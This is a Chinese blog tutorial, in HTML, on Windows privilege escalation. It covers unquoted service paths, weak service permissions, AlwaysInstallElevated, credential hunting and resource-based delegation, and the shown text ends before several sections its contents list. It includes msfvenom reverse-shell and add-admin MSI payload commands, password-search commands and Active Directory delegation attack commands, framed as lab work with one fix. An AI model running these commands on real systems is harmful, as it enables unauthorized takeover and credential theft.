<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="无引号服务路径 （ Trusted Service Paths ）先说实用度，比较被动，而且比较看脸。 Windows下服务的权限通常是SYSTEM。如果我们能够替换服务的启动程序为我们的恶意程序（如反弹shell），即相当于获得了SYSTEM权限，达到了提权的目的。无引号服务路径有可能会导致这种情况的发生。所谓无引号服务路径，就是服务启动程序的路径中包含了空格且未被引号包含起来。比如这样 C:\">
<meta property="og:type" content="article">
<meta property="og:title" content="Windows提权方法汇总">
<meta property="og:url" content="http://const27.com/2021/02/19/Windows%E6%8F%90%E6%9D%83/index.html">
<meta property="og:site_name" content="ConsT27&#39;s Blog">
<meta property="og:description" content="无引号服务路径 （ Trusted Service Paths ）先说实用度，比较被动，而且比较看脸。 Windows下服务的权限通常是SYSTEM。如果我们能够替换服务的启动程序为我们的恶意程序（如反弹shell），即相当于获得了SYSTEM权限，达到了提权的目的。无引号服务路径有可能会导致这种情况的发生。所谓无引号服务路径，就是服务启动程序的路径中包含了空格且未被引号包含起来。比如这样 C:\">
<meta property="og:locale">
<meta property="og:image" content="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217143921.png">
<meta property="og:image" content="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217143934.png">
<meta property="og:image" content="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217143945.png">
<meta property="og:image" content="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217144053.png">
<meta property="og:image" content="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217144102.png">
<meta property="og:image" content="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217144124.png">
<meta property="og:image" content="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217144141.png">
<meta property="og:image" content="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217135833.png">
<meta property="og:image" content="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217135859.png">
<meta property="og:image" content="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217140628.png">
<meta property="og:image" content="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217140659.png">
<meta property="og:image" content="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217140726.png">
<meta property="og:image" content="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217140944.png">
<meta property="og:image" content="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217140737.png">
<meta property="og:image" content="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217141050.png">
<meta property="og:image" content="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217141131.png">
<meta property="og:image" content="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217141313.png">
<meta property="og:image" content="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217141325.png">
<meta property="og:image" content="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217141339.png">
<meta property="og:image" content="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217144509.png">
<meta property="og:image" content="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217144534.png">
<meta property="og:image" content="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217144553.png">
<meta property="og:image" content="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217144620.png">
<meta property="article:published_time" content="2021-02-19T09:21:51.308Z">
<meta property="article:modified_time" content="2021-02-19T08:50:44.681Z">
<meta property="article:author" content="ConsT27">
<meta property="article:tag" content="提权">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217143921.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Windows提权方法汇总</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 5.3.0"><link rel="alternate" href="/atom.xml" title="ConsT27's Blog" type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Inici</a></li><!--
     --><!--
       --><li><a href="/about/">Qui som</a></li><!--
     --><!--
       --><li><a href="/archives/">Articles</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/ConsT27">Projectes</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Post Anterior" href="/2021/03/12/Linux%E6%8F%90%E6%9D%83%E6%80%BB%E7%BB%93/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Post Següent" href="/2021/02/19/%E5%8F%8B%E9%93%BE/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Adalt" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Compartir Post" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Post Anterior</span>
      <span id="i-next" class="info" style="display:none;">Post Següent</span>
      <span id="i-top" class="info" style="display:none;">Adalt</span>
      <span id="i-share" class="info" style="display:none;">Compartir Post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://const27.com/2021/02/19/Windows%E6%8F%90%E6%9D%83/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://const27.com/2021/02/19/Windows%E6%8F%90%E6%9D%83/&text=Windows提权方法汇总"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://const27.com/2021/02/19/Windows%E6%8F%90%E6%9D%83/&title=Windows提权方法汇总"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://const27.com/2021/02/19/Windows%E6%8F%90%E6%9D%83/&is_video=false&description=Windows提权方法汇总"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Windows提权方法汇总&body=Check out this article: http://const27.com/2021/02/19/Windows%E6%8F%90%E6%9D%83/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://const27.com/2021/02/19/Windows%E6%8F%90%E6%9D%83/&title=Windows提权方法汇总"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://const27.com/2021/02/19/Windows%E6%8F%90%E6%9D%83/&title=Windows提权方法汇总"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://const27.com/2021/02/19/Windows%E6%8F%90%E6%9D%83/&title=Windows提权方法汇总"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://const27.com/2021/02/19/Windows%E6%8F%90%E6%9D%83/&title=Windows提权方法汇总"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://const27.com/2021/02/19/Windows%E6%8F%90%E6%9D%83/&name=Windows提权方法汇总&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://const27.com/2021/02/19/Windows%E6%8F%90%E6%9D%83/&t=Windows提权方法汇总"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%97%A0%E5%BC%95%E5%8F%B7%E6%9C%8D%E5%8A%A1%E8%B7%AF%E5%BE%84-%EF%BC%88-Trusted-Service-Paths-%EF%BC%89"><span class="toc-number">1.</span> <span class="toc-text">无引号服务路径 （ Trusted Service Paths ）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%98%93%E5%8F%97%E6%94%BB%E5%87%BB%E7%9A%84%E6%9C%8D%E5%8A%A1%EF%BC%88Vulnerable-Services-%EF%BC%89"><span class="toc-number">2.</span> <span class="toc-text">易受攻击的服务（Vulnerable Services ）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#AlwaysInstallElevated"><span class="toc-number">3.</span> <span class="toc-text">AlwaysInstallElevated</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2"><span class="toc-number">4.</span> <span class="toc-text">信息泄露</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%BA%E4%BA%8E%E8%B5%84%E6%BA%90%E7%9A%84%E5%9F%9F%E5%A7%94%E6%B4%BE%E6%94%BB%E5%87%BB"><span class="toc-number">5.</span> <span class="toc-text">基于资源的域委派攻击</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8E%9F%E7%90%86%E7%9A%84%E5%87%A0%E4%B8%AA%E7%82%B9%EF%BC%9A"><span class="toc-number">5.0.1.</span> <span class="toc-text">原理的几个点：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E6%B5%81%E7%A8%8B"><span class="toc-number">5.0.2.</span> <span class="toc-text">攻击流程:</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%AE%9E%E6%93%8D"><span class="toc-number">5.0.3.</span> <span class="toc-text">实操</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%95%8F%E6%84%9F%E7%94%A8%E6%88%B7%E4%B8%8D%E5%8F%AF%E5%A7%94%E6%B4%BE%E7%9A%84%E7%BB%95%E8%BF%87"><span class="toc-number">5.0.4.</span> <span class="toc-text">敏感用户不可委派的绕过</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#POTATO-%E5%AE%B6%E6%97%8F"><span class="toc-number">6.</span> <span class="toc-text">POTATO 家族</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#hot-potato"><span class="toc-number">6.1.</span> <span class="toc-text">hot potato</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#MYSQL%E4%B8%8B%E7%9A%84%E6%8F%90%E6%9D%83%E6%8A%80%E6%9C%AF"><span class="toc-number">7.</span> <span class="toc-text">MYSQL下的提权技术</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#MOF%E6%8F%90%E6%9D%83"><span class="toc-number">7.1.</span> <span class="toc-text">MOF提权</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#UDF%E6%8F%90%E6%9D%83"><span class="toc-number">7.2.</span> <span class="toc-text">UDF提权</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%90%AF%E5%8A%A8%E9%A1%B9%E6%8F%90%E6%9D%83"><span class="toc-number">7.3.</span> <span class="toc-text">启动项提权</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%91%BD%E5%90%8D%E7%AE%A1%E9%81%93%E6%8F%90%E6%9D%83"><span class="toc-number">8.</span> <span class="toc-text">命名管道提权</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%A4%E7%89%8C%E7%AA%83%E5%8F%96"><span class="toc-number">9.</span> <span class="toc-text">令牌窃取</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Windows提权方法汇总
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">ConsT27</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2021-02-19T09:21:51.308Z" itemprop="datePublished">2021-02-19</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/%E6%8F%90%E6%9D%83/" rel="tag">提权</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="无引号服务路径-（-Trusted-Service-Paths-）"><a href="#无引号服务路径-（-Trusted-Service-Paths-）" class="headerlink" title="无引号服务路径 （ Trusted Service Paths ）"></a>无引号服务路径 （ <strong>Trusted Service Paths</strong> ）</h2><p>先说实用度，比较被动，而且比较看脸。</p>
<p>Windows下服务的权限通常是SYSTEM。如果我们能够替换服务的启动程序为我们的恶意程序（如反弹shell），即相当于获得了SYSTEM权限，达到了提权的目的。<br>无引号服务路径有可能会导致这种情况的发生。<br>所谓无引号服务路径，就是服务启动程序的路径中包含了空格且未被引号包含起来。比如这样</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">C:\Program Files\floder1\service.exe</span><br></pre></td></tr></table></figure>
<p>因为空格的存在，Windows在启动服务找寻服务启动项时，它会按照以下顺序进行启动项寻找</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">C:\Program.exe</span><br><span class="line">C:\Program Files\Some.exe</span><br><span class="line">C:\Program Files\Some Folder\Service.exe</span><br></pre></td></tr></table></figure>
<p>这就给了我们有机可乘的机会：如果我们在服务的上层目录有写入或完全控制权限，我们完全可以将一个可执行文件放在Windows搜寻服务启动项的更靠前顺序上。</p>
<p><img src="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217143921.png" alt="QQ截图20210217143921"></p>
<p>我们用以下命令来搜索哪些服务路径没有包含引号</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">wmic service get name,displayname,pathname,startmode |findstr &#x2F;i &quot;Auto&quot; |findstr &#x2F;i &#x2F;v &quot;C:\Windows\\&quot; |findstr &#x2F;i &#x2F;v &quot;&quot;&quot;</span><br></pre></td></tr></table></figure>
<p>找到一个。接下来我们的思路可能就是在2345Explorer目录下创建一个Protect.exe了，所以我们要看看2345Explorer目录我们的权限如何。</p>
<p>先来一手whoami /all.发现自己是Users组的。</p>
<p><img src="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217143934.png" alt="QQ截图20210217143934"></p>
<p>然后使用icacls命令查看在2345Explorer目录的权限如何</p>
<p><img src="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217143945.png" alt="QQ截图20210217143945"></p>
<p>users组是完全控制权（F），那么我们直接用msfvenom构造一个反弹shell的exe。命名为Protect.exe，放入2345Explorer目录。我这里随便编码了一下</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">msfvenom -p windows&#x2F;meterpreter&#x2F;reverse_http -e x86&#x2F;shikata_ga_nai LHOST&#x3D;192.168.111.129 LPORT&#x3D;10068 -f exe -o Protect.exe</span><br></pre></td></tr></table></figure>
<p><img src="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217144053.png" alt="QQ截图20210217144053"></p>
<p>然后我们现在是没有能力重启服务的。。只能等管理员重启服务或者机子重启。然后就拿到SYSTEM权限了。但是这里还有一个坑点，这个坑点是如果一个服务启动后在一定时间内未与 Service Control Manager(SCM) 通讯，就会被停止。</p>
<p><img src="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217144102.png" alt="QQ截图20210217144102"></p>
<p>所以我们要在拿到shell后及时的转移进程或者添加管理员账户。<br>转移进程在msf中很简单，meterpreter中先用ps查看进程，随便找一个system权限，记住其pid，然后 migrate PID 即可完成进程迁移。</p>
<p>下面来说说防治方法吧。进入注册表修改窗口，在 HKEY_LOCAL_MACHINE &gt;&gt; SYSTEM &gt;&gt; CurrentControlSet &gt;&gt; Services 路径下找到存在漏洞的服务，修改其ImagePath，把路径前后加个引号就可了。</p>
<h2 id="易受攻击的服务（Vulnerable-Services-）"><a href="#易受攻击的服务（Vulnerable-Services-）" class="headerlink" title="易受攻击的服务（Vulnerable Services ）"></a>易受攻击的服务（<strong>Vulnerable Services</strong> ）</h2><p>同样看脸且被动</p>
<p>这个攻击方法大致分两类<br>1.替换服务的二进制文件。这个方法较为简单，如果对服务二进制文件所在目录有修改权，那么我们完全可以创建一个恶意程序来替换原有的二进制文件服务。这个比较简单，而且基本上攻击流程和<strong>Trusted Service Paths</strong>如出一辙，同样也是比较被动地等待重启服务才能弹shell，就不再演示了。<br>2.修改服务的属性。如果我们能修改服务的 <strong>BINARY_PATH_NAME</strong> 属性（这个属性用于指向服务的二进制文件），我们就可以通过设置 <strong>BINARY_PATH_NAME</strong> 的值为系统命令，然后重启服务时我们的系统命令会被执行。</p>
<p>对于后者，我们需要一款工具来快速揭示出我们能修改哪些服务的属性。<br>这个工具我们采用accesschk.exe，它是微软产出的，基本不会报毒。</p>
<p>我们通过该工具执行以下命令</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">accesschk.exe -uwcqv &quot;Authenticated Users&quot; * &#x2F;accepteula</span><br><span class="line">or</span><br><span class="line">accesschk.exe -uwcqv &quot;Users&quot; * &#x2F;accepteula</span><br><span class="line">来查看Users组（根据实际情况来填哪个组）对哪些服务有哪些权限</span><br></pre></td></tr></table></figure>
<p>如果对某个服务有service_all_access或者以下权限，就说明能对其属性进行修改。</p>
<p><img src="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217144124.png" alt="QQ截图20210217144124"></p>
<p>比如我们对Spooler服务有service_all_access权限，我们就可以这样做。<br>通过修改其binPath为恶意指令，然后等待管理员重启服务，我们的恶意指令就会被执行。</p>
<p><img src="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217144141.png" alt="QQ截图20210217144141"></p>
<h2 id="AlwaysInstallElevated"><a href="#AlwaysInstallElevated" class="headerlink" title="AlwaysInstallElevated"></a><strong>AlwaysInstallElevated</strong></h2><p>如果windows启用了如下注册表项</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">[HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer]</span><br><span class="line">“AlwaysInstallElevated”&#x3D;dword:00000001 </span><br><span class="line"></span><br><span class="line">[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]</span><br><span class="line">“AlwaysInstallElevated”&#x3D;dword:00000001</span><br></pre></td></tr></table></figure>
<p>那么所有msi（windows应用安装程序）都会以SYSTEM权限运行。此时如果我们执行一个恶意msi程序，即可达到提权目的<br>同时需要注意的一点是，这个注册表项不一定总是存在的。（比如我的实验机</p>
<p>我们可以通过reg query来验证这两条注册表项的情况</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer &#x2F;v AlwaysInstallElevated</span><br><span class="line">reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer &#x2F;v AlwaysInstallElevated</span><br></pre></td></tr></table></figure>
<p>若均为1，我们就可以通过msfvenom生成恶意msi来提权</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">msfvenom -p windows&#x2F;adduser USER&#x3D;rottenadmin PASS&#x3D;P@ssword123! -f msi -o rotten.msi</span><br></pre></td></tr></table></figure>
<p>然后执行，获得一个管理员账户。</p>
<h2 id="信息泄露"><a href="#信息泄露" class="headerlink" title="信息泄露"></a>信息泄露</h2><p><em>Unattend.xml</em> <em>sysprep.xml和sysprep.inf文件</em><code>GPP.xml</code> 存在着一定信息泄露，他们通常存在于以下路径</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">C:\Windows\Panther\</span><br><span class="line">C:\Windows\Panther\Unattend\</span><br><span class="line">C:\Windows\System32\</span><br><span class="line">C:\Windows\System32\sysprep\</span><br></pre></td></tr></table></figure>
<p>找到后，找到 <em>Unattend.xml</em> 文件中的 <UserAccounts> 标签。就有可能找到用户的加密后的密码。。</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&lt;UserAccounts&gt;</span><br><span class="line">    &lt;LocalAccounts&gt;</span><br><span class="line">        &lt;LocalAccount&gt;</span><br><span class="line">            &lt;Password&gt;</span><br><span class="line">                &lt;Value&gt;UEBzc3dvcmQxMjMhUGFzc3dvcmQ&#x3D;&lt;&#x2F;Value&gt; &#x2F;&#x2F;PASSWORD</span><br><span class="line">                &lt;PlainText&gt;false&lt;&#x2F;PlainText&gt;</span><br><span class="line">            &lt;&#x2F;Password&gt;</span><br><span class="line">            &lt;Description&gt;Local Administrator&lt;&#x2F;Description&gt;</span><br><span class="line">            &lt;DisplayName&gt;Administrator&lt;&#x2F;DisplayName&gt;</span><br><span class="line">            &lt;Group&gt;Administrators&lt;&#x2F;Group&gt;</span><br><span class="line">            &lt;Name&gt;Administrator&lt;&#x2F;Name&gt;</span><br><span class="line">        &lt;&#x2F;LocalAccount&gt;</span><br><span class="line">    &lt;&#x2F;LocalAccounts&gt;</span><br><span class="line">&lt;&#x2F;UserAccounts&gt;</span><br><span class="line">一些敏感文件查询指令</span><br><span class="line">C:\Users\user\Desktop&gt; dir C:\ &#x2F;s &#x2F;b &#x2F;c | findstr &#x2F;sr \*password\*</span><br><span class="line">reg query HKLM &#x2F;f password &#x2F;t REG_SZ &#x2F;s</span><br><span class="line">reg query HKCU &#x2F;f password &#x2F;t REG_SZ &#x2F;s</span><br></pre></td></tr></table></figure>
<h2 id="基于资源的域委派攻击"><a href="#基于资源的域委派攻击" class="headerlink" title="基于资源的域委派攻击"></a>基于资源的域委派攻击</h2><p>refer:<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7454">https://xz.aliyun.com/t/7454</a></p>
<h4 id="原理的几个点："><a href="#原理的几个点：" class="headerlink" title="原理的几个点："></a>原理的几个点：</h4><p>1.S4U2SELF 协议可以在用户没有配置 TrustedToAuthenticationForDelegation 属性（即开启使用任何协议认证的约束性委派）时被调用，但是返回的ST是不可被转发的。<br>2.基于资源的约束性委派主机 在被另一台主机委派访问时，在S4U2PROXY过程中提交过来的ST如果即使是不可转发的。KDC依旧会返回有效的ST2。<br>3.每个普通域用户默认可以创建至多十个机器账户（ 由MachineAccountQuota属性决定 ），每个机器账户被创建时都会自动注册SPN: <code>RestrictedKrbHost/domain</code>和<code>HOST/domain</code>这两个SPN</p>
<h4 id="攻击流程"><a href="#攻击流程" class="headerlink" title="攻击流程:"></a>攻击流程:</h4><p>假设开启基于资源的约束性委派机器为A<br>1.首先要有一个对当前计算机有写权限的账户，才能对A设置可以 被 委派访问的服务账户。<br>2.利用当前账户创建一个机器账户，并配置好机器账户到A的 基于资源的约束性委派<br>3.因为机器账户是我们创建的，我们知道他的密码账户，可以让它利用S4U2SELF协议获得一个不可转发ST。然后用这个不可转发ST通过S4U2PROXY，在基于资源的约束性委派基础上获得有效的访问A cifs服务的ST2。<br>4.用ST2访问A的CIFS服务，权限获得。</p>
<h4 id="实操"><a href="#实操" class="headerlink" title="实操"></a>实操</h4><p>这个攻击说白了就是个提权…</p>
<p>首先我们检查一下域控是否是win2012以上的主机，因为只有这样才能开启 基于资源的约束性委派。</p>
<p>我们使用powersploit下的powerview脚本。执行命令 get-netdomaincontroller</p>
<p><img src="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217135833.png" alt="QQ截图20210217135833"></p>
<p>可以获得域控WIN版本</p>
<p>然后我们查看当前用户对哪台主机有写权限。因为是实验，所以我们先来看看怎么配置一个用户对一个机器的权限。<br>直接在域控上找到某主机，然后进入在属性里进入安全选项卡，添加某用户，然后给这个用户分配权限即可。</p>
<p><img src="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217135859.png" alt="QQ截图20210217135859"></p>
<p>我们依旧使用powerview。先调用<br><code>Get-DomainUser -Identity username -Properties objectsid</code>来获取当前用户SID<br>然后<code>Get-DomainObjectAcl -Identity 主机名 | ?&#123;$_.SecurityIdentifier -match &quot;刚刚得到的SID&quot;&#125;</code> 查看当前用户对某台主机是否有写权限。</p>
<p><img src="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217140628.png" alt="QQ截图20210217140628"></p>
<p>如果有 GenericAll（完全控制权），GenericWrite、WriteProperty、WriteDacl 这些属性，就说明该用户能修改计算机的账户属性。<br>如图看到我们对WIN7进行操作</p>
<p>好的，我们接下来就要创立一个机器用户了。根据网上搜索结果，使用powermad这个ps脚本可以很快捷的创建一个机器用户。<a target="_blank" rel="noopener" href="https://github.com/Kevin-Robertson/Powermad">https://github.com/Kevin-Robertson/Powermad</a></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">Import-Module .\Powermad.ps1New-MachineAccount -MachineAccount hacksystem -Password $(ConvertTo-SecureString &quot;hack&quot; -AsPlainText -Force)</span><br></pre></td></tr></table></figure>
<p><img src="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217140659.png" alt="QQ截图20210217140659"></p>
<p>好的，我们添加了一个密码hack，名为hacksystem的机器账户，接下来就是配置hacksystem到WIN7的委派了。我们需要做的，是修改WIN7的 <code>msDS-AllowedToActOnBehalfOfOtherIdentity</code>属性的值 ，这个操作我们用powerview实现。</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">$SD &#x3D; New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList &quot;O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3298638106-3321833000-1571791979-1112)&quot;  </span><br><span class="line">#这儿的sid是我们创建的#机器用户#evilsystem的sid</span><br><span class="line">$SDBytes &#x3D; New-Object byte[] ($SD.BinaryLength)</span><br><span class="line">$SD.GetBinaryForm($SDBytes, 0)</span><br><span class="line">Get-DomainComputer WIN7| Set-DomainObject -Set @&#123;&#39;msds-allowedtoactonbehalfofotheridentity&#39;&#x3D;$SDBytes&#125; -Verbose</span><br></pre></td></tr></table></figure>
<p><img src="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217140726.png" alt="QQ截图20210217140726"></p>
<p>至于机器账户SID怎么获得，powerview下的 <code>get-domiancomputer hacksystem</code><br>然后使用<code>Get-DomainComputer WIN7 -Properties msds-allowedtoactonbehalfofotheridentity</code> 查看委派是否设置成功</p>
<p><code>Set-DomainObject win7 -Clear &#39;msds-allowedtoactonbehalfofotheridentity&#39; -Verbose </code>此命令可以清除 msds-allowedtoactonbehalfofotheridentity属性的值</p>
<p>现在都统统设置好了，开始下一步吧。<br>网上一般用的rubeus，这里我用kekeo吧</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">Rubeus.exe hash &#x2F;user:xxx &#x2F;password:xxx &#x2F;domain:xxx</span><br></pre></td></tr></table></figure>
<p>本地运算出机器用户ntlm hash 这里借用一下别人的图</p>
<p><img src="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217140944.png" alt="QQ截图20210217140944"></p>
